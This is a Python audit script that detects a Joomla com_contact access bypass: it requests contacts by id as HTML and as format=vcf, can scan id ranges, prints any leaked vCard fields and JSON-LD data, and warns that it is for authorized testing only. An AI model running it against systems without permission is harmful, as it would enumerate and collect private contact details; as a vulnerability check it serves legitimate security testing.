#!/usr/bin/env python3
"""
Check REPORTABLE-04: Joomla com_contact guest vCard access bypass.

Use only against Joomla instances you own or are explicitly authorized to test.
The strongest signal is:

  HTML contact view returns 401/403, but the same contact with format=vcf
  returns HTTP 200 and a BEGIN:VCARD body.
"""

from __future__ import annotations

import argparse
import html
import json
import re
import ssl
import sys
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass
from typing import Iterable


# User-Agent header value used when --user-agent is not given.
DEFAULT_USER_AGENT = "reportable-04-vcf-check/1.0"
# vCard property names kept by parse_vcard_fields(); compared upper-cased,
# with any ";PARAM=..." suffix removed from the property name first.
VCARD_FIELDS_TO_PRINT = ("FN", "N", "TITLE", "TEL", "ADR", "EMAIL", "URL", "ORG")
# JSON-LD "@type" values that make an embedded JSON-LD block worth reporting.
JSONLD_TYPES_OF_INTEREST = {"Person", "ContactPoint"}
# HTTP status codes interpreted as "the guest was denied access".
DENIED_STATUSES = {401, 403}


@dataclass
class Response:
    """Outcome of one HTTP request.

    ``status`` is the HTTP status code, or 0 when the request failed before a
    status was obtained; in that case ``error`` holds the failure description.
    ``headers`` is expected to use lower-cased header names.
    """

    url: str
    status: int
    headers: dict[str, str]
    body: bytes
    error: str | None = None

    @property
    def text(self) -> str:
        """Return the body decoded with the Content-Type charset (UTF-8 fallback).

        Undecodable bytes are replaced rather than raising, and an unknown
        charset name falls back to UTF-8.
        """
        declared = re.search(
            r"charset=([^\s;]+)",
            self.headers.get("content-type", ""),
            flags=re.I,
        )
        encoding = declared.group(1).strip("\"'") if declared else "utf-8"

        try:
            decoded = self.body.decode(encoding, errors="replace")
        except LookupError:
            # The server advertised a codec Python does not know.
            decoded = self.body.decode("utf-8", errors="replace")
        return decoded


@dataclass
class CheckResult:
    """Everything gathered for one contact id from the HTML and vCard requests."""

    contact_id: int
    html_response: Response
    vcf_response: Response
    vcard_fields: list[tuple[str, str]]
    html_vcf_link_present: bool
    jsonld_hits: list[str]
    expected_hits_html: list[str]
    expected_hits_vcf: list[str]

    @property
    def vcf_is_vcard(self) -> bool:
        """True when vCard fields were parsed and the body contains BEGIN:VCARD."""
        if not self.vcard_fields:
            return False
        return "BEGIN:VCARD" in self.vcf_response.text.upper()

    @property
    def denied_html_allowed_vcf(self) -> bool:
        """True for the bypass pattern: HTML denied, format=vcf served a vCard."""
        html_denied = self.html_response.status in DENIED_STATUSES
        vcf_served = self.vcf_response.status == 200
        return html_denied and vcf_served and self.vcf_is_vcard

    @property
    def direct_vcf_without_html_link(self) -> bool:
        """True when both views return 200 and a vCard, but the HTML has no vcf link."""
        if self.html_response.status != 200 or self.vcf_response.status != 200:
            return False
        return self.vcf_is_vcard and not self.html_vcf_link_present

    @property
    def jsonld_leak_on_denied_html(self) -> bool:
        """True when a denied HTML response still carried reportable JSON-LD."""
        html_denied = self.html_response.status in DENIED_STATUSES
        return html_denied and bool(self.jsonld_hits)


def parse_args() -> argparse.Namespace:
    """Define the command-line interface and parse the process arguments."""
    usage_examples = (
        "Examples:\n"
        "  python3 audit/reportable_04_vcf_bypass_check.py http://127.0.0.1:103 --id 2\n"
        "  python3 audit/reportable_04_vcf_bypass_check.py http://192.168.1.25 --range 1-20 --expect private@example.test"
    )
    cli = argparse.ArgumentParser(
        description="Check Joomla REPORTABLE-04 com_contact format=vcf guest access bypass.",
        epilog=usage_examples,
        # Keep the hand-formatted line breaks of the examples in --help output.
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    option = cli.add_argument

    # Target and contact selection.
    option("base_url", help="Base Joomla URL, for example http://127.0.0.1:103 or http://host/joomla")
    option("--id", dest="ids", action="append", type=int, help="Contact id to test. Can be repeated.")
    option("--range", dest="ranges", action="append", help="Inclusive contact id range, for example 1-20.")
    option(
        "--expect",
        dest="expected",
        action="append",
        default=[],
        help="Sensitive string expected in leaked output, such as a private contact name or email. Can be repeated.",
    )

    # Transport settings.
    option("--timeout", type=float, default=10.0, help="HTTP timeout in seconds. Default: 10.")
    option("--insecure", action="store_true", help="Disable TLS certificate verification.")
    option("--user-agent", default=DEFAULT_USER_AGENT, help=f"User-Agent header. Default: {DEFAULT_USER_AGENT}")

    # Output and safety limits.
    option("--show-body", action="store_true", help="Print the full returned vCard body for positive findings.")
    option(
        "--max-ids",
        type=int,
        default=200,
        help="Safety cap for total tested contact ids when using ranges. Default: 200.",
    )
    return cli.parse_args()


def normalize_base_url(base_url: str) -> str:
    """Return *base_url* as an http(s) URL that ends with exactly one slash.

    A value without an explicit ``scheme://`` prefix (for example
    ``localhost:8080`` or ``127.0.0.1:103``) is treated as a plain host and
    gets ``http://`` prepended.

    Raises:
        ValueError: if the scheme is not http/https, the host is missing, or
            the port is not numeric.
    """
    candidate = base_url.strip()

    # Do not rely on urlparse() to detect a missing scheme: it parses
    # "localhost:8080" as scheme "localhost", which would wrongly reject a
    # perfectly reasonable host:port argument.
    if not re.match(r"[A-Za-z][A-Za-z0-9+.-]*://", candidate):
        candidate = "http://" + candidate.lstrip("/")

    parsed = urllib.parse.urlparse(candidate)
    if parsed.scheme not in {"http", "https"}:
        raise ValueError("base_url must use http or https")
    if not parsed.hostname:
        raise ValueError("base_url must include a host")
    try:
        parsed.port  # Accessing the attribute validates the port component.
    except ValueError:
        raise ValueError("base_url has an invalid port") from None

    return candidate.rstrip("/") + "/"


def parse_ranges(range_args: Iterable[str] | None) -> list[int]:
    """Expand ``START-END`` strings into a flat list of ids (bounds inclusive).

    Reversed bounds are accepted and swapped. Ids appear in argument order and
    are not de-duplicated.

    Raises:
        ValueError: if a value is not of the form ``START-END``.
    """
    if not range_args:
        return []

    range_pattern = re.compile(r"\s*(\d+)\s*-\s*(\d+)\s*")
    expanded: list[int] = []
    for spec in range_args:
        parsed = range_pattern.fullmatch(spec)
        if parsed is None:
            raise ValueError(f"invalid --range value {spec!r}; expected START-END")
        low, high = sorted(int(bound) for bound in parsed.groups())
        expanded += range(low, high + 1)
    return expanded


def build_contact_url(base_url: str, contact_id: int, *, vcf: bool = False) -> str:
    """Build the ``index.php`` URL of a com_contact contact view.

    With ``vcf=True`` the ``format=vcf`` parameter is appended to request the
    vCard rendering of the same contact.
    """
    query = [
        ("option", "com_contact"),
        ("view", "contact"),
        ("id", str(contact_id)),
    ]
    if vcf:
        query.append(("format", "vcf"))

    endpoint = urllib.parse.urljoin(base_url, "index.php")
    return f"{endpoint}?{urllib.parse.urlencode(query)}"


def fetch(url: str, *, timeout: float, user_agent: str, context: ssl.SSLContext | None) -> Response:
    """Perform a GET request and always return a Response instead of raising.

    HTTP error statuses (4xx/5xx) are returned as ordinary responses with
    their status, headers and body. Any transport-level failure, whether while
    connecting or while reading the body, yields a Response with ``status=0``
    and ``error`` set, so one bad request cannot abort a multi-id scan.

    Args:
        url: Absolute URL to request.
        timeout: Socket timeout in seconds.
        user_agent: Value for the User-Agent header.
        context: TLS context to use, or None for the urllib default.
    """
    import http.client  # local import: only the exception type is needed here

    # URLError/TimeoutError/ssl.SSLError/ConnectionError all derive from OSError;
    # http.client.HTTPException covers protocol-level failures such as
    # IncompleteRead or BadStatusLine raised while reading the response.
    transport_errors = (OSError, http.client.HTTPException)

    def failed(reason: object) -> Response:
        return Response(url=url, status=0, headers={}, body=b"", error=str(reason))

    request = urllib.request.Request(
        url,
        headers={
            "User-Agent": user_agent,
            "Accept": "*/*",
        },
    )

    try:
        with urllib.request.urlopen(request, timeout=timeout, context=context) as response:
            return Response(
                url=response.geturl(),
                status=response.status,
                headers={k.lower(): v for k, v in response.headers.items()},
                body=response.read(),
            )
    except urllib.error.HTTPError as exc:
        # Must come before URLError/OSError: HTTPError is a subclass of both.
        # Reading the error body can itself fail, and an exception raised in
        # this handler would not be caught by the sibling clauses below.
        try:
            return Response(
                url=exc.geturl(),
                status=exc.code,
                headers={k.lower(): v for k, v in exc.headers.items()},
                body=exc.read(),
            )
        except transport_errors as read_exc:
            return failed(read_exc or type(read_exc).__name__)
        finally:
            # HTTPError wraps the open response; release the connection.
            exc.close()
    except urllib.error.URLError as exc:
        return failed(exc.reason)
    except transport_errors as exc:
        return failed(str(exc) or type(exc).__name__)


def unfold_vcard(text: str) -> list[str]:
    """Split vCard text into logical lines, joining folded continuation lines.

    CRLF and bare CR are treated as LF. A line starting with a space or tab is
    appended (minus that one character) to the previous line; if there is no
    previous line it is kept unchanged.
    """
    logical: list[str] = []
    for physical in text.replace("\r\n", "\n").replace("\r", "\n").split("\n"):
        is_continuation = bool(logical) and physical[:1] in (" ", "\t")
        if is_continuation:
            logical[-1] = logical[-1] + physical[1:]
        else:
            logical.append(physical)
    return logical


def parse_vcard_fields(text: str) -> list[tuple[str, str]]:
    """Extract the vCard properties listed in VCARD_FIELDS_TO_PRINT.

    Returns ``(raw property name including parameters, stripped value)`` pairs
    in document order, or an empty list when *text* lacks either a BEGIN:VCARD
    or an END:VCARD marker (case-insensitive).
    """
    haystack = text.upper()
    if not ("BEGIN:VCARD" in haystack and "END:VCARD" in haystack):
        return []

    selected: list[tuple[str, str]] = []
    for entry in unfold_vcard(text):
        name_part, separator, value_part = entry.partition(":")
        if not separator:
            continue
        # "TEL;TYPE=WORK" -> "TEL": parameters do not take part in the match.
        property_name = name_part.partition(";")[0].upper()
        if property_name in VCARD_FIELDS_TO_PRINT:
            selected.append((name_part, value_part.strip()))
    return selected


def html_has_vcf_link(text: str) -> bool:
    """Report whether the entity-decoded HTML mentions ``format=vcf`` (any case)."""
    decoded = html.unescape(text).lower()
    return decoded.find("format=vcf") != -1


def find_jsonld_hits(text: str, expected: list[str]) -> list[str]:
    """Summarize JSON-LD ``<script>`` blocks in *text* that are worth reporting.

    A block is reported when it declares one of JSONLD_TYPES_OF_INTEREST or
    contains one of the non-empty *expected* strings. Each hit is a one-line
    summary: the first few schema types followed by a short snippet.
    """
    hits: list[str] = []
    script_pattern = re.compile(
        r"<script\b[^>]*type=[\"']application/ld\+json[\"'][^>]*>(.*?)</script>",
        flags=re.I | re.S,
    )

    for match in script_pattern.finditer(text):
        literal = match.group(1).strip()
        unescaped = html.unescape(literal).strip()
        if not unescaped:
            continue

        # <script> is a raw-text element, so its content is normally NOT
        # entity-encoded. Unescaping first would turn text such as &quot;
        # inside a JSON string into a bare quote and make valid JSON
        # unparseable, so parse the literal content first and only fall back
        # to the unescaped form for generators that do escape their JSON.
        parsed_types: list[str] | None = None
        for candidate in (literal, unescaped):
            try:
                parsed_types = extract_schema_types(json.loads(candidate))
            except (json.JSONDecodeError, RecursionError):
                # RecursionError: pathologically nested input from the server.
                continue
            break
        if parsed_types is None:
            parsed_types = ["unparsed JSON-LD"]

        interesting = bool(JSONLD_TYPES_OF_INTEREST.intersection(parsed_types))
        expected_match = any(
            needle and (needle in unescaped or needle in literal) for needle in expected
        )
        if interesting or expected_match:
            summary = ", ".join(parsed_types[:5]) if parsed_types else "JSON-LD"
            if expected_match:
                summary += " containing expected string"
            compact = re.sub(r"\s+", " ", unescaped)
            hits.append(f"{summary}: {interesting_jsonld_snippet(compact, expected)}")
    return hits


def extract_schema_types(value: object) -> list[str]:
    """Collect every ``@type`` found anywhere in a decoded JSON document.

    Types are returned in depth-first document order with duplicates removed
    (first occurrence wins). Entries of a list-valued ``@type`` are converted
    with ``str()``.
    """

    def iter_types(node: object):
        if isinstance(node, dict):
            declared = node.get("@type")
            if isinstance(declared, str):
                yield declared
            elif isinstance(declared, list):
                yield from map(str, declared)
            # Only containers can hold further "@type" declarations.
            for child in node.values():
                if isinstance(child, (dict, list)):
                    yield from iter_types(child)
        elif isinstance(node, list):
            for child in node:
                yield from iter_types(child)

    unique: list[str] = []
    seen: set[str] = set()
    for schema_type in iter_types(value):
        if schema_type not in seen:
            seen.add(schema_type)
            unique.append(schema_type)
    return unique


def interesting_jsonld_snippet(compact_jsonld: str, expected: list[str]) -> str:
    """Return a short excerpt of *compact_jsonld* around the first marker found.

    Markers are tried in order: the non-empty *expected* strings, then the
    Person/ContactPoint type markers. The excerpt spans 80 characters before
    and 180 after the marker start, with ``...`` on each truncated side. When
    no marker occurs, the first 220 characters are returned.
    """
    markers = [*filter(None, expected), '"@type":"Person"', '"@type": "Person"', "ContactPoint"]
    total = len(compact_jsonld)

    for marker in markers:
        hit_at = compact_jsonld.find(marker)
        if hit_at < 0:
            continue
        window_start = max(hit_at - 80, 0)
        window_end = min(hit_at + 180, total)
        lead = "..." if window_start > 0 else ""
        tail = "..." if window_end < total else ""
        return f"{lead}{compact_jsonld[window_start:window_end]}{tail}"

    return compact_jsonld[:220]


def find_expected_hits(text: str, expected: list[str]) -> list[str]:
    """Return the non-empty *expected* strings that occur in *text*, in input order."""
    found: list[str] = []
    for needle in expected:
        if needle and text.find(needle) != -1:
            found.append(needle)
    return found


def run_check(
    base_url: str,
    contact_id: int,
    *,
    timeout: float,
    user_agent: str,
    context: ssl.SSLContext | None,
    expected: list[str],
) -> CheckResult:
    """Request one contact as HTML and as vCard and analyze both responses.

    The HTML view is requested first, then the ``format=vcf`` view; both use
    the same timeout, User-Agent and TLS context.
    """

    def request_view(*, as_vcf: bool):
        target = build_contact_url(base_url, contact_id, vcf=as_vcf)
        return fetch(target, timeout=timeout, user_agent=user_agent, context=context)

    html_response = request_view(as_vcf=False)
    vcf_response = request_view(as_vcf=True)

    # Decode each body once; several analyses below reuse the text.
    page, card = html_response.text, vcf_response.text

    return CheckResult(
        contact_id=contact_id,
        html_response=html_response,
        vcf_response=vcf_response,
        vcard_fields=parse_vcard_fields(card),
        html_vcf_link_present=html_has_vcf_link(page),
        jsonld_hits=find_jsonld_hits(page, expected),
        expected_hits_html=find_expected_hits(page, expected),
        expected_hits_vcf=find_expected_hits(card, expected),
    )


def print_result(result: CheckResult, *, show_body: bool) -> None:
    """Print the human-readable report for one contact id to stdout.

    The report has a status line, any request errors, a single verdict line,
    then optional details: expected-string hits, JSON-LD hits on a denied HTML
    response, parsed vCard fields and, with *show_body*, the full vCard body.
    """
    html_resp = result.html_response
    vcf_resp = result.vcf_response

    def status_label(status: int) -> str:
        # Status 0 marks a request that failed before any HTTP status arrived.
        return str(status) if status != 0 else "ERR"

    vcard_flag = "yes" if result.vcf_is_vcard else "no"
    print(
        f"[contact id {result.contact_id}]"
        f" HTML={status_label(html_resp.status)}"
        f" VCF={status_label(vcf_resp.status)}"
        f" vcard={vcard_flag}"
    )

    if html_resp.error:
        print(f"  HTML request error: {html_resp.error}")
    if vcf_resp.error:
        print(f"  VCF request error: {vcf_resp.error}")

    # Exactly one verdict is printed; the first matching condition wins.
    if result.denied_html_allowed_vcf:
        verdict = "  VULNERABLE: guest HTML view is denied, but direct format=vcf returns a vCard."
    elif result.direct_vcf_without_html_link:
        verdict = "  WARNING: HTML view did not advertise a vCard link, but direct format=vcf returns a vCard."
    elif vcf_resp.status == 200 and result.vcf_is_vcard:
        verdict = "  INFO: direct format=vcf returns a vCard. This is not an access bypass unless the contact should be hidden."
    elif vcf_resp.status in DENIED_STATUSES:
        verdict = "  OK: direct format=vcf is denied."
    elif html_resp.status == 404 and vcf_resp.status == 404:
        verdict = "  OK: contact was not found in either view."
    else:
        verdict = "  INCONCLUSIVE: response pattern does not match the reported bypass."
    print(verdict)

    if result.expected_hits_vcf:
        print(f"  Expected string(s) in VCF: {', '.join(result.expected_hits_vcf)}")
    if result.expected_hits_html:
        print(f"  Expected string(s) in HTML response: {', '.join(result.expected_hits_html)}")

    if result.jsonld_leak_on_denied_html:
        print("  JSON-LD side leak on denied HTML response:")
        for summary in result.jsonld_hits:
            print(f"    - {summary}")

    if result.vcard_fields:
        print("  VCF fields:")
        for field_name, field_value in result.vcard_fields:
            print(f"    {field_name}: {field_value}")

    if show_body and result.vcf_is_vcard:
        print("  Full VCF body:")
        for body_line in vcf_resp.text.rstrip().splitlines():
            print(f"    {body_line}")


def main() -> int:
    """Run the check for every requested contact id and return the exit code.

    Returns:
        2 if at least one contact shows the bypass (HTML denied, vCard served);
        1 on a usage error or if any request failed at the transport level;
        0 otherwise.
    """
    args = parse_args()

    try:
        base_url = normalize_base_url(args.base_url)
        ids = list(args.ids or [])
        ids.extend(parse_ranges(args.ranges))
    except ValueError as exc:
        print(f"error: {exc}", file=sys.stderr)
        return 1

    # A zero timeout switches the socket to non-blocking mode and a negative
    # one is rejected by the socket layer with ValueError, which would surface
    # as a traceback on the first request. Reject both up front instead.
    if not args.timeout > 0:
        print("error: --timeout must be greater than 0", file=sys.stderr)
        return 1

    # De-duplicate ids given via overlapping --id/--range options.
    ids = sorted(set(ids))
    if not ids:
        print("error: pass at least one --id or --range START-END", file=sys.stderr)
        return 1
    if len(ids) > args.max_ids:
        print(f"error: refusing to test {len(ids)} ids; raise --max-ids if this is intentional", file=sys.stderr)
        return 1

    context = None
    if args.insecure:
        # Public-API equivalent of an unverified context. check_hostname must
        # be switched off before verify_mode may be set to CERT_NONE.
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

    any_vulnerable = False
    any_inconclusive_error = False

    for contact_id in ids:
        result = run_check(
            base_url,
            contact_id,
            timeout=args.timeout,
            user_agent=args.user_agent,
            context=context,
            expected=args.expected,
        )
        print_result(result, show_body=args.show_body)
        print()

        any_vulnerable = any_vulnerable or result.denied_html_allowed_vcf
        # Status 0 means the request never produced an HTTP status.
        any_inconclusive_error = (
            any_inconclusive_error
            or result.html_response.status == 0
            or result.vcf_response.status == 0
        )

    # A confirmed finding takes precedence over transport errors.
    if any_vulnerable:
        return 2
    if any_inconclusive_error:
        return 1
    return 0


if __name__ == "__main__":
    # Propagate main()'s return value as the process exit status.
    sys.exit(main())
